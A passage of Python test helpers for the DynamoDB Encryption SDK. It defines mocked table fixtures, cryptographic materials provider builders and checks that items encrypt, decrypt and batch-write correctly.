RawDecryptionMaterials, RawEncryptionMaterials\nfrom dynamodb_encryption_sdk.structures import AttributeActions, EncryptionContext\nfrom dynamodb_encryption_sdk.transform import ddb_to_dict, dict_to_ddb\n\nRUNNING_IN_TRAVIS = \"TRAVIS\" in os.environ\n_DELEGATED_KEY_CACHE = defaultdict(lambda: defaultdict(dict))\nTEST_TABLE_NAME = \"my_table\"\nTEST_REGION_NAME = \"us-west-2\"\nTEST_INDEX = {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"test_value\"},\n \"sort_attribute\": {\"type\": \"N\", \"value\": Decimal(\"99.233\")},\n}\nSECONDARY_INDEX = {\n \"secondary_index_1\": {\"type\": \"B\", \"value\": Binary(b\"\\x00\\x01\\x02\")},\n \"secondary_index_2\": {\"type\": \"S\", \"value\": \"another_value\"},\n}\nTEST_KEY = {name: value[\"value\"] for name, value in TEST_INDEX.items()}\nTEST_BATCH_INDEXES = [\n {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"test_value\"},\n \"sort_attribute\": {\"type\": \"N\", \"value\": Decimal(\"99.233\")},\n },\n {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"test_value\"},\n \"sort_attribute\": {\"type\": \"N\", \"value\": Decimal(\"92986745\")},\n },\n {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"test_value\"},\n \"sort_attribute\": {\"type\": \"N\", \"value\": Decimal(\"2231.0001\")},\n },\n {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"another_test_value\"},\n \"sort_attribute\": {\"type\": \"N\", \"value\": Decimal(\"732342\")},\n },\n]\nTEST_BATCH_KEYS = [{name: value[\"value\"] for name, value in key.items()} for key in TEST_BATCH_INDEXES]\n\n\n@pytest.fixture(scope=\"module\")\ndef mock_ddb_service():\n \"\"\"Centralize service mock to avoid resetting service for tests that use multiple tables.\"\"\"\n with mock_dynamodb2():\n yield boto3.client(\"dynamodb\", region_name=TEST_REGION_NAME)\n\n\n@pytest.fixture\ndef example_table(mock_ddb_service):\n mock_ddb_service.create_table(\n TableName=TEST_TABLE_NAME,\n KeySchema=[\n {\"AttributeName\": \"partition_attribute\", \"KeyType\": \"HASH\"},\n {\"AttributeName\": \"sort_attribute\", \"KeyType\": \"RANGE\"},\n ],\n AttributeDefinitions=[\n {\"AttributeName\": name, \"AttributeType\": value[\"type\"]} for name, value in TEST_INDEX.items()\n ],\n ProvisionedThroughput={\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n )\n yield mock_ddb_service\n mock_ddb_service.delete_table(TableName=TEST_TABLE_NAME)\n\n\n@pytest.fixture\ndef table_with_local_secondary_indexes(mock_ddb_service):\n mock_ddb_service.create_table(\n TableName=TEST_TABLE_NAME,\n KeySchema=[\n {\"AttributeName\": \"partition_attribute\", \"KeyType\": \"HASH\"},\n {\"AttributeName\": \"sort_attribute\", \"KeyType\": \"RANGE\"},\n ],\n LocalSecondaryIndexes=[\n {\n \"IndexName\": \"lsi-1\",\n \"KeySchema\": [{\"AttributeName\": \"secondary_index_1\", \"KeyType\": \"HASH\"}],\n \"Projection\": {\"ProjectionType\": \"ALL\"},\n },\n {\n \"IndexName\": \"lsi-2\",\n \"KeySchema\": [{\"AttributeName\": \"secondary_index_2\", \"KeyType\": \"HASH\"}],\n \"Projection\": {\"ProjectionType\": \"ALL\"},\n },\n ],\n AttributeDefinitions=[\n {\"AttributeName\": name, \"AttributeType\": value[\"type\"]}\n for name, value in list(TEST_INDEX.items()) + list(SECONDARY_INDEX.items())\n ],\n ProvisionedThroughput={\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n )\n yield mock_ddb_service\n mock_ddb_service.delete_table(TableName=TEST_TABLE_NAME)\n\n\n@pytest.fixture\ndef table_with_global_secondary_indexes(mock_ddb_service):\n mock_ddb_service.create_table(\n TableName=TEST_TABLE_NAME,\n KeySchema=[\n {\"AttributeName\": \"partition_attribute\", \"KeyType\": \"HASH\"},\n {\"AttributeName\": \"sort_attribute\", \"KeyType\": \"RANGE\"},\n ],\n GlobalSecondaryIndexes=[\n {\n \"IndexName\": \"gsi-1\",\n \"KeySchema\": [{\"AttributeName\": \"secondary_index_1\", \"KeyType\": \"HASH\"}],\n \"Projection\": {\"ProjectionType\": \"ALL\"},\n \"ProvisionedThroughput\": {\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n },\n {\n \"IndexName\": \"gsi-2\",\n \"KeySchema\": [{\"AttributeName\": \"secondary_index_2\", \"KeyType\": \"HASH\"}],\n \"Projection\": {\"ProjectionType\": \"ALL\"},\n \"ProvisionedThroughput\": {\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n },\n ],\n AttributeDefinitions=[\n {\"AttributeName\": name, \"AttributeType\": value[\"type\"]}\n for name, value in list(TEST_INDEX.items()) + list(SECONDARY_INDEX.items())\n ],\n ProvisionedThroughput={\"ReadCapacityUnits\": 100, \"WriteCapacityUnits\": 100},\n )\n yield mock_ddb_service\n mock_ddb_service.delete_table(TableName=TEST_TABLE_NAME)\n\n\nclass PassThroughCryptographicMaterialsProviderThatRequiresAttributes(CryptographicMaterialsProvider):\n \"\"\"Cryptographic materials provider that passes through to another, but requires that attributes are set.\n\n If the EncryptionContext passed to decryption_materials or encryption_materials\n ever does not have attributes set,\n a ValueError is raised.\n Otherwise, it passes through to the passthrough CMP normally.\n \"\"\"\n\n def __init__(self, passthrough_cmp):\n self._passthrough_cmp = passthrough_cmp\n\n @staticmethod\n def _assert_attributes_set(encryption_context):\n # type: (EncryptionContext) -> None\n if not encryption_context.attributes:\n raise ValueError(\"Encryption context attributes MUST be set!\")\n\n def decryption_materials(self, encryption_context):\n # type: (EncryptionContext) -> CryptographicMaterials\n self._assert_attributes_set(encryption_context)\n return self._passthrough_cmp.decryption_materials(encryption_context)\n\n def encryption_materials(self, encryption_context):\n # type: (EncryptionContext) -> CryptographicMaterials\n self._assert_attributes_set(encryption_context)\n return self._passthrough_cmp.encryption_materials(encryption_context)\n\n def refresh(self):\n # type: () -> None\n self._passthrough_cmp.refresh()\n\n\ndef _get_from_cache(dk_class, algorithm, key_length):\n \"\"\"Don't generate new keys every time. All we care about is that they are valid keys, not that they are unique.\"\"\"\n try:\n return _DELEGATED_KEY_CACHE[dk_class][algorithm][key_length]\n except KeyError:\n key = dk_class.generate(algorithm, key_length)\n _DELEGATED_KEY_CACHE[dk_class][algorithm][key_length] = key\n return key\n\n\ndef build_static_jce_cmp(encryption_algorithm, encryption_key_length, signing_algorithm, signing_key_length):\n \"\"\"Build a StaticCryptographicMaterialsProvider using ephemeral JceNameLocalDelegatedKeys as specified.\"\"\"\n encryption_key = _get_from_cache(JceNameLocalDelegatedKey, encryption_algorithm, encryption_key_length)\n authentication_key = _get_from_cache(JceNameLocalDelegatedKey, signing_algorithm, signing_key_length)\n encryption_materials = RawEncryptionMaterials(signing_key=authentication_key, encryption_key=encryption_key)\n decryption_materials = RawDecryptionMaterials(verification_key=authentication_key, decryption_key=encryption_key)\n return StaticCryptographicMaterialsProvider(\n encryption_materials=encryption_materials, decryption_materials=decryption_materials\n )\n\n\ndef _build_wrapped_jce_cmp(wrapping_algorithm, wrapping_key_length, signing_algorithm, signing_key_length):\n \"\"\"Build a WrappedCryptographicMaterialsProvider using ephemeral JceNameLocalDelegatedKeys as specified.\"\"\"\n wrapping_key = _get_from_cache(JceNameLocalDelegatedKey, wrapping_algorithm, wrapping_key_length)\n signing_key = _get_from_cache(JceNameLocalDelegatedKey, signing_algorithm, signing_key_length)\n return WrappedCryptographicMaterialsProvider(\n wrapping_key=wrapping_key, unwrapping_key=wrapping_key, signing_key=signing_key\n )\n\n\ndef _all_encryption():\n \"\"\"All encryption configurations to test in slow tests.\"\"\"\n return itertools.chain(itertools.product((\"AES\",), (128, 256)), itertools.product((\"RSA\",), (1024, 2048, 4096)))\n\n\ndef _all_authentication():\n \"\"\"All authentication configurations to test in slow tests.\"\"\"\n return itertools.chain(\n itertools.product((\"HmacSHA224\", \"HmacSHA256\", \"HmacSHA384\", \"HmacSHA512\"), (128, 256)),\n itertools.product((\"SHA224withRSA\", \"SHA256withRSA\", \"SHA384withRSA\", \"SHA512withRSA\"), (1024, 2048, 4096)),\n )\n\n\ndef _all_algorithm_pairs():\n \"\"\"All algorithm pairs (encryption + authentication) to test in slow tests.\"\"\"\n for encryption_pair, signing_pair in itertools.product(_all_encryption(), _all_authentication()):\n yield encryption_pair + signing_pair\n\n\ndef _some_algorithm_pairs():\n \"\"\"Cherry-picked set of algorithm pairs (encryption + authentication) to test in fast tests.\"\"\"\n return ((\"AES\", 256, \"HmacSHA256\", 256), (\"AES\", 256, \"SHA256withRSA\", 4096), (\"RSA\", 4096, \"SHA256withRSA\", 4096))\n\n\n_cmp_builders = {\"static\": build_static_jce_cmp, \"wrapped\": _build_wrapped_jce_cmp}\n\n\ndef _all_possible_cmps(algorithm_generator, require_attributes):\n \"\"\"Generate all possible cryptographic materials providers based on the supplied generator.\n\n require_attributes determines whether the CMP will be wrapped in\n PassThroughCryptographicMaterialsProviderThatRequiresAttributes\n to require that attributes are set on every request.\n This should ONLY be disabled on the item encryptor tests.\n All high-level helper clients MUST set the attributes before passing the encryption context down.\n \"\"\"\n # The AES combinations do the same thing, but this makes sure that the AESWrap name works as expected.\n yield _build_wrapped_jce_cmp(\"AESWrap\", 256, \"HmacSHA256\", 256)\n\n for builder_info, args in itertools.product(_cmp_builders.items(), algorithm_generator()):\n builder_type, builder_func = builder_info\n encryption_algorithm, encryption_key_length, signing_algorithm, signing_key_length = args\n\n if builder_type == \"static\" and encryption_algorithm != \"AES\":\n # Only AES keys are allowed to be used with static materials\n continue\n\n id_string = \"{enc_algorithm}/{enc_key_length} {builder_type} {sig_algorithm}/{sig_key_length}\".format(\n enc_algorithm=encryption_algorithm,\n enc_key_length=encryption_key_length,\n builder_type=builder_type,\n sig_algorithm=signing_algorithm,\n sig_key_length=signing_key_length,\n )\n\n inner_cmp = builder_func(encryption_algorithm, encryption_key_length, signing_algorithm, signing_key_length)\n\n if require_attributes:\n outer_cmp = PassThroughCryptographicMaterialsProviderThatRequiresAttributes(inner_cmp)\n else:\n outer_cmp = inner_cmp\n\n yield pytest.param(outer_cmp, id=id_string)\n\n\ndef set_parametrized_cmp(metafunc, require_attributes=True):\n \"\"\"Set paramatrized values for cryptographic materials providers.\n\n require_attributes determines whether the CMP will be wrapped in\n PassThroughCryptographicMaterialsProviderThatRequiresAttributes\n to require that attributes are set on every request.\n This should ONLY be disabled on the item encryptor tests.\n All high-level helper clients MUST set the attributes before passing the encryption context down.\n \"\"\"\n for name, algorithm_generator in ((\"all_the_cmps\", _all_algorithm_pairs), (\"some_cmps\", _some_algorithm_pairs)):\n if name in metafunc.fixturenames:\n metafunc.parametrize(name, _all_possible_cmps(algorithm_generator, require_attributes))\n\n\n_ACTIONS = {\n \"hypothesis_actions\": (\n pytest.param(AttributeActions(default_action=CryptoAction.ENCRYPT_AND_SIGN), id=\"encrypt all\"),\n pytest.param(AttributeActions(default_action=CryptoAction.SIGN_ONLY), id=\"sign only all\"),\n pytest.param(AttributeActions(default_action=CryptoAction.DO_NOTHING), id=\"do nothing\"),\n )\n}\n_ACTIONS[\"parametrized_actions\"] = _ACTIONS[\"hypothesis_actions\"] + (\n pytest.param(\n AttributeActions(\n default_action=CryptoAction.ENCRYPT_AND_SIGN,\n attribute_actions={\n \"number_set\": CryptoAction.SIGN_ONLY,\n \"string_set\": CryptoAction.SIGN_ONLY,\n \"binary_set\": CryptoAction.SIGN_ONLY,\n },\n ),\n id=\"sign sets, encrypt everything else\",\n ),\n pytest.param(\n AttributeActions(\n default_action=CryptoAction.ENCRYPT_AND_SIGN,\n attribute_actions={\n \"number_set\": CryptoAction.DO_NOTHING,\n \"string_set\": CryptoAction.DO_NOTHING,\n \"binary_set\": CryptoAction.DO_NOTHING,\n },\n ),\n id=\"ignore sets, encrypt everything else\",\n ),\n pytest.param(\n AttributeActions(\n default_action=CryptoAction.DO_NOTHING, attribute_actions={\"map\": CryptoAction.ENCRYPT_AND_SIGN}\n ),\n id=\"encrypt map, ignore everything else\",\n ),\n pytest.param(\n AttributeActions(\n default_action=CryptoAction.SIGN_ONLY,\n attribute_actions={\n \"number_set\": CryptoAction.DO_NOTHING,\n \"string_set\": CryptoAction.DO_NOTHING,\n \"binary_set\": CryptoAction.DO_NOTHING,\n \"map\": CryptoAction.ENCRYPT_AND_SIGN,\n },\n ),\n id=\"ignore sets, encrypt map, sign everything else\",\n ),\n)\n\n\ndef set_parametrized_actions(metafunc):\n \"\"\"Set parametrized values for attribute actions.\"\"\"\n for name, actions in _ACTIONS.items():\n if name in metafunc.fixturenames:\n metafunc.parametrize(name, actions)\n\n\ndef set_parametrized_item(metafunc):\n \"\"\"Set parametrized values for items to cycle.\"\"\"\n if \"parametrized_item\" in metafunc.fixturenames:\n metafunc.parametrize(\"parametrized_item\", (pytest.param(diverse_item(), id=\"diverse item\"),))\n\n\ndef diverse_item():\n base_item = {\n \"int\": 5,\n \"decimal\": Decimal(\"123.456\"),\n \"string\": \"this is a string\",\n \"binary\": b\"this is a bytestring! \\x01\",\n \"number_set\": set([5, 4, 3]),\n \"string_set\": set([\"abc\", \"def\", \"geh\"]),\n \"binary_set\": set([b\"\\x00\\x00\\x00\", b\"\\x00\\x01\\x00\", b\"\\x00\\x00\\x02\"]),\n }\n base_item[\"list\"] = [copy.copy(i) for i in base_item.values()]\n base_item[\"map\"] = copy.deepcopy(base_item)\n return copy.deepcopy(base_item)\n\n\n_reserved_attributes = {attr.value for attr in ReservedAttributes}\n\n\ndef return_requestitems_as_unprocessed(*args, **kwargs):\n return {\"UnprocessedItems\": kwargs[\"RequestItems\"]}\n\n\ndef check_encrypted_item(plaintext_item, ciphertext_item, attribute_actions):\n # Verify that all expected attributes are present\n ciphertext_attributes = set(ciphertext_item.keys())\n plaintext_attributes = set(plaintext_item.keys())\n if attribute_actions.take_no_actions:\n assert ciphertext_attributes == plaintext_attributes\n else:\n assert ciphertext_attributes == plaintext_attributes.union(_reserved_attributes)\n\n for name, value in ciphertext_item.items():\n # Skip the attributes we add\n if name in _reserved_attributes:\n continue\n\n # If the attribute should have been encrypted, verify that it is Binary and different from the original\n if attribute_actions.action(name) is CryptoAction.ENCRYPT_AND_SIGN:\n assert isinstance(value, Binary)\n assert value != plaintext_item[name]\n # Otherwise, verify that it is the same as the original\n else:\n assert value == plaintext_item[name]\n\n\ndef _matching_key(actual_item, expected):\n expected_item = [\n i\n for i in expected\n if i[\"partition_attribute\"] == actual_item[\"partition_attribute\"]\n and i[\"sort_attribute\"] == actual_item[\"sort_attribute\"]\n ]\n assert len(expected_item) == 1\n return expected_item[0]\n\n\ndef _nop_transformer(item):\n return item\n\n\ndef assert_items_exist_in_list(source, expected, transformer):\n for actual_item in source:\n expected_item = _matching_key(actual_item, expected)\n assert transformer(actual_item) == transformer(expected_item)\n\n\ndef assert_equal_lists_of_items(actual, expected, transformer=_nop_transformer):\n assert len(actual) == len(expected)\n assert_items_exist_in_list(actual, expected, transformer)\n\n\ndef assert_list_of_items_contains(full, subset, transformer=_nop_transformer):\n assert len(full) >= len(subset)\n assert_items_exist_in_list(subset, full, transformer)\n\n\ndef check_many_encrypted_items(actual, expected, attribute_actions, transformer=_nop_transformer):\n assert len(actual) == len(expected)\n\n for actual_item in actual:\n expected_item = _matching_key(actual_item, expected)\n check_encrypted_item(\n plaintext_item=transformer(expected_item),\n ciphertext_item=transformer(actual_item),\n attribute_actions=attribute_actions,\n )\n\n\ndef _generate_items(initial_item, write_transformer):\n items = []\n for key in TEST_BATCH_KEYS:\n _item = initial_item.copy()\n _item.update(key)\n items.append(write_transformer(_item))\n return items\n\n\ndef _cleanup_items(encrypted, write_transformer, table_name=TEST_TABLE_NAME):\n ddb_keys = [write_transformer(key) for key in TEST_BATCH_KEYS]\n _delete_result = encrypted.batch_write_item( # noqa\n RequestItems={table_name: [{\"DeleteRequest\": {\"Key\": _key}} for _key in ddb_keys]}\n )\n\n\ndef cycle_batch_item_check(\n raw,\n encrypted,\n initial_actions,\n initial_item,\n write_transformer=_nop_transformer,\n read_transformer=_nop_transformer,\n table_name=TEST_TABLE_NAME,\n delete_items=True,\n):\n \"\"\"Check that cycling (plaintext->encrypted->decrypted) item batch has the expected results.\"\"\"\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n items = _generate_items(initial_item, write_transformer)\n items_in_table = len(items)\n\n _put_result = encrypted.batch_write_item( # noqa\n RequestItems={table_name: [{\"PutRequest\": {\"Item\": _item}} for _item in items]}\n )\n\n try:\n ddb_keys = [write_transformer(key) for key in TEST_BATCH_KEYS]\n encrypted_result = raw.batch_get_item(RequestItems={table_name: {\"Keys\": ddb_keys}})\n check_many_encrypted_items(\n actual=encrypted_result[\"Responses\"][table_name],\n expected=items,\n attribute_actions=check_attribute_actions,\n transformer=read_transformer,\n )\n\n decrypted_result = encrypted.batch_get_item(RequestItems={table_name: {\"Keys\": ddb_keys}})\n assert_equal_lists_of_items(\n actual=decrypted_result[\"Responses\"][table_name], expected=items, transformer=read_transformer\n )\n finally:\n if delete_items:\n _cleanup_items(encrypted, write_transformer, table_name)\n items_in_table = 0\n\n del check_attribute_actions\n del items\n return items_in_table\n\n\ndef cycle_batch_writer_check(raw_table, encrypted_table, initial_actions, initial_item):\n \"\"\"Cycling (plaintext->encrypted->decrypted) items with the Table batch writer should have the expected results.\"\"\"\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n items = _generate_items(initial_item, _nop_transformer)\n\n with encrypted_table.batch_writer() as writer:\n for item in items:\n writer.put_item(item)\n\n ddb_keys = copy.copy(TEST_BATCH_KEYS)\n encrypted_items = [raw_table.get_item(Key=key, ConsistentRead=True)[\"Item\"] for key in ddb_keys]\n check_many_encrypted_items(\n actual=encrypted_items, expected=items, attribute_actions=check_attribute_actions, transformer=_nop_transformer\n )\n\n decrypted_result = [encrypted_table.get_item(Key=key, ConsistentRead=True)[\"Item\"] for key in ddb_keys]\n assert_equal_lists_of_items(actual=decrypted_result, expected=items, transformer=_nop_transformer)\n\n with encrypted_table.batch_writer() as writer:\n for key in ddb_keys:\n writer.delete_item(key)\n\n del check_attribute_actions\n del items\n\n\ndef batch_write_item_unprocessed_check(\n encrypted, initial_item, write_transformer=_nop_transformer, table_name=TEST_TABLE_NAME\n):\n \"\"\"Check that unprocessed items in a batch result are unencrypted.\"\"\"\n items = _generate_items(initial_item, write_transformer)\n\n request_items = {table_name: [{\"PutRequest\": {\"Item\": _item}} for _item in items]}\n _put_result = encrypted.batch_write_item(RequestItems=request_items)\n\n # we expect results to include Unprocessed items, or the test case is invalid!\n unprocessed_items = _put_result[\"UnprocessedItems\"]\n assert unprocessed_items != {}\n\n unprocessed = [operation[\"PutRequest\"][\"Item\"] for operation in unprocessed_items[TEST_TABLE_NAME]]\n assert_list_of_items_contains(items, unprocessed, transformer=_nop_transformer)\n\n del items\n\n\ndef cycle_item_check(plaintext_item, crypto_config):\n \"\"\"Check that cycling (plaintext->encrypted->decrypted) an item has the expected results.\"\"\"\n ciphertext_item = encrypt_python_item(plaintext_item, crypto_config)\n\n check_encrypted_item(plaintext_item, ciphertext_item, crypto_config.attribute_actions)\n\n cycled_item = decrypt_python_item(ciphertext_item, crypto_config)\n\n assert cycled_item == plaintext_item\n del ciphertext_item\n del cycled_item\n\n\ndef table_cycle_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n item = initial_item.copy()\n item.update(TEST_KEY)\n\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n table = boto3.resource(\"dynamodb\", **kwargs).Table(table_name)\n e_table = EncryptedTable(table=table, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n _put_result = e_table.put_item(Item=item) # noqa\n\n encrypted_result = table.get_item(Key=TEST_KEY, ConsistentRead=True)\n check_encrypted_item(item, encrypted_result[\"Item\"], check_attribute_actions)\n\n decrypted_result = e_table.get_item(Key=TEST_KEY, ConsistentRead=True)\n assert decrypted_result[\"Item\"] == item\n\n e_table.delete_item(Key=TEST_KEY)\n del item\n del check_attribute_actions\n\n\ndef table_cycle_batch_writer_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n table = boto3.resource(\"dynamodb\", **kwargs).Table(table_name)\n e_table = EncryptedTable(table=table, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n cycle_batch_writer_check(table, e_table, initial_actions, initial_item)\n\n\ndef table_batch_writer_unprocessed_items_check(\n materials_provider, initial_actions, initial_item, table_name, region_name=None\n):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n resource = boto3.resource(\"dynamodb\", **kwargs)\n table = resource.Table(table_name)\n\n items = _generate_items(initial_item, _nop_transformer)\n request_items = {table_name: [{\"PutRequest\": {\"Item\": _item}} for _item in items]}\n\n with patch.object(table.meta.client, \"batch_write_item\") as batch_write_mock:\n # Check that unprocessed items returned to a BatchWriter are successfully retried\n batch_write_mock.side_effect = [{\"UnprocessedItems\": request_items}, {\"UnprocessedItems\": {}}]\n e_table = EncryptedTable(table=table, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n with e_table.batch_writer() as writer:\n for item in items:\n writer.put_item(item)\n\n del items\n\n\ndef resource_cycle_batch_items_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n resource = boto3.resource(\"dynamodb\", **kwargs)\n e_resource = EncryptedResource(\n resource=resource, materials_provider=materials_provider, attribute_actions=initial_actions\n )\n\n cycle_batch_item_check(\n raw=resource,\n encrypted=e_resource,\n initial_actions=initial_actions,\n initial_item=initial_item,\n table_name=table_name,\n )\n\n raw_scan_result = resource.Table(table_name).scan(ConsistentRead=True)\n e_scan_result = e_resource.Table(table_name).scan(ConsistentRead=True)\n assert not raw_scan_result[\"Items\"]\n assert not e_scan_result[\"Items\"]\n\n\ndef resource_batch_items_unprocessed_check(\n materials_provider, initial_actions, initial_item, table_name, region_name=None\n):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n resource = boto3.resource(\"dynamodb\", **kwargs)\n\n with patch.object(resource, \"batch_write_item\", return_requestitems_as_unprocessed):\n e_resource = EncryptedResource(\n resource=resource, materials_provider=materials_provider, attribute_actions=initial_actions\n )\n\n batch_write_item_unprocessed_check(\n encrypted=e_resource, initial_item=initial_item, write_transformer=dict_to_ddb, table_name=table_name\n )\n\n\ndef client_cycle_single_item_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n item = initial_item.copy()\n item.update(TEST_KEY)\n ddb_item = dict_to_ddb(item)\n ddb_key = dict_to_ddb(TEST_KEY)\n\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n client = boto3.client(\"dynamodb\", **kwargs)\n e_client = EncryptedClient(client=client, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n _put_result = e_client.put_item(TableName=table_name, Item=ddb_item) # noqa\n\n encrypted_result = client.get_item(TableName=table_name, Key=ddb_key, ConsistentRead=True)\n check_encrypted_item(item, ddb_to_dict(encrypted_result[\"Item\"]), check_attribute_actions)\n\n decrypted_result = e_client.get_item(TableName=table_name, Key=ddb_key, ConsistentRead=True)\n assert ddb_to_dict(decrypted_result[\"Item\"]) == item\n\n e_client.delete_item(TableName=table_name, Key=ddb_key)\n del item\n del check_attribute_actions\n\n\ndef client_cycle_batch_items_check(materials_provider, initial_actions, initial_item, table_name, region_name=None):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n client = boto3.client(\"dynamodb\", **kwargs)\n e_client = EncryptedClient(client=client, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n cycle_batch_item_check(\n raw=client,\n encrypted=e_client,\n initial_actions=initial_actions,\n initial_item=initial_item,\n write_transformer=dict_to_ddb,\n read_transformer=ddb_to_dict,\n table_name=table_name,\n )\n\n raw_scan_result = client.scan(TableName=table_name, ConsistentRead=True)\n e_scan_result = e_client.scan(TableName=table_name, ConsistentRead=True)\n assert not raw_scan_result[\"Items\"]\n assert not e_scan_result[\"Items\"]\n\n\ndef client_batch_items_unprocessed_check(\n materials_provider, initial_actions, initial_item, table_name, region_name=None\n):\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n client = boto3.client(\"dynamodb\", **kwargs)\n\n with patch.object(client, \"batch_write_item\", return_requestitems_as_unprocessed):\n e_client = EncryptedClient(\n client=client, materials_provider=materials_provider, attribute_actions=initial_actions\n )\n\n batch_write_item_unprocessed_check(\n encrypted=e_client, initial_item=initial_item, write_transformer=dict_to_ddb, table_name=table_name\n )\n\n\ndef client_cycle_batch_items_check_scan_paginator(\n materials_provider, initial_actions, initial_item, table_name, region_name=None\n):\n \"\"\"Helper function for testing the \"scan\" paginator.\n\n Populate the specified table with encrypted items,\n scan the table with raw client paginator to get encrypted items,\n scan the table with encrypted client paginator to get decrypted items,\n then verify that all items appear to have been encrypted correctly.\n \"\"\" # noqa=D401\n # pylint: disable=too-many-locals\n kwargs = {}\n if region_name is not None:\n kwargs[\"region_name\"] = region_name\n client = boto3.client(\"dynamodb\", **kwargs)\n e_client = EncryptedClient(client=client, materials_provider=materials_provider, attribute_actions=initial_actions)\n\n items_in_table = cycle_batch_item_check(\n raw=client,\n encrypted=e_client,\n initial_actions=initial_actions,\n initial_item=initial_item,\n write_transformer=dict_to_ddb,\n read_transformer=ddb_to_dict,\n table_name=table_name,\n delete_items=False,\n )\n\n try:\n encrypted_items = []\n raw_paginator = client.get_paginator(\"scan\")\n for page in raw_paginator.paginate(TableName=table_name, ConsistentRead=True):\n encrypted_items.extend(page[\"Items\"])\n\n decrypted_items = []\n encrypted_paginator = e_client.get_paginator(\"scan\")\n for page in encrypted_paginator.paginate(TableName=table_name, ConsistentRead=True):\n decrypted_items.extend(page[\"Items\"])\n\n assert encrypted_items and decrypted_items\n assert len(encrypted_items) == len(decrypted_items) == items_in_table\n\n check_attribute_actions = initial_actions.copy()\n check_attribute_actions.set_index_keys(*list(TEST_KEY.keys()))\n check_many_encrypted_items(\n actual=encrypted_items,\n expected=decrypted_items,\n attribute_actions=check_attribute_actions,\n transformer=ddb_to_dict,\n )\n\n finally:\n _cleanup_items(encrypted=e_client, write_transformer=dict_to_ddb, table_name=table_name)\n\n raw_scan_result = client.scan(TableName=table_name, ConsistentRead=True)\n e_scan_result = e_client.scan(TableName=table_name, ConsistentRead=True)\n assert not raw_scan_result[\"Items\"]\n assert not e_scan_result[\"Items\"]\n\n\ndef build_metastore():\n client = boto3.client(\"dynamodb\", region_name=TEST_REGION_NAME)\n table_name = base64.urlsafe_b64encode(os.urandom(32)).decode(\"utf-8\").replace(\"=\", \".\")\n\n MetaStore.create_table(client, table_name, 1, 1)\n waiter = client.get_waiter(\"table_exists\")\n waiter.wait(TableName=table_name)\n\n table = boto3.resource(\"dynamodb\", region_name=TEST_REGION_NAME).Table(table_name)\n return MetaStore(table, build_static_jce_cmp(\"AES\", 256, \"HmacSHA256\", 256)), table_name\n\n\ndef delete_metastore(table_name):\n client = boto3.client(\"dynamodb\", region_name=TEST_REGION_NAME)\n client.delete_table(TableName=table_name)\n # It sometimes takes a long time to delete a table.\n # If hanging, asynchronously deleting tables becomes an issue,\n # come back to this.\n # Otherwise, let's just let them take care of themselves.\n # waiter = client.get_waiter(\"table_not_exists\")\n # waiter.wait(TableName=table_name)\n\n\n@pytest.fixture\ndef mock_metastore():\n with mock_dynamodb2():\n metastore, table_name = build_metastore()\n yield metastore\n delete_metastore(table_name)\n\n\ndef _count_entries(records, *messages):\n count = 0\n\n for record in records:\n if all((message in record.getMessage() for message in messages)):\n count += 1\n\n return count\n\n\ndef _count_puts(records, table_name):\n return _count_entries(records, '\"TableName\": \"{}\"'.format(table_name), \"OperationModel(name=PutItem)\")\n\n\ndef _count_gets(records, table_name):\n return _count_entries(records, '\"TableName\": \"{}\"'.format(table_name), \"OperationModel(name=GetItem)\")\n\n\ndef check_metastore_cache_use_encrypt(metastore, table_name, log_capture):\n try:\n table = boto3.resource(\"dynamodb\").Table(table_name)\n except NoRegionError:\n table = boto3.resource(\"dynamodb\", region_name=TEST_REGION_NAME).Table(table_name)\n\n most_recent_provider = CachingMostRecentProvider(provider_store=metastore, material_name=\"test\", version_ttl=600.0)\n e_table = EncryptedTable(table=table, materials_provider=most_recent_provider)\n\n item = diverse_item()\n item.update(TEST_KEY)\n e_table.put_item(Item=item)\n e_table.put_item(Item=item)\n e_table.put_item(Item=item)\n e_table.put_item(Item=item)\n\n try:\n primary_puts = _count_puts(log_capture.records, e_table.name)\n metastore_puts = _count_puts(log_capture.records, metastore._table.name)\n\n assert primary_puts == 4\n assert metastore_puts == 1\n\n e_table.get_item(Key=TEST_KEY)\n e_table.get_item(Key=TEST_KEY)\n e_table.get_item(Key=TEST_KEY)\n\n primary_gets = _count_gets(log_capture.records, e_table.name)\n metastore_gets = _count_gets(log_capture.records, metastore._table.name)\n metastore_puts = _count_puts(log_capture.records, metastore._table.name)\n\n assert primary_gets == 3\n assert metastore_gets == 0\n assert metastore_puts == 1\n\n most_recent_provider.refresh()\n\n e_table.get_item(Key=TEST_KEY)\n e_table.get_item(Key=TEST_KEY)\n e_table.get_item(Key=TEST_KEY)\n\n primary_gets = 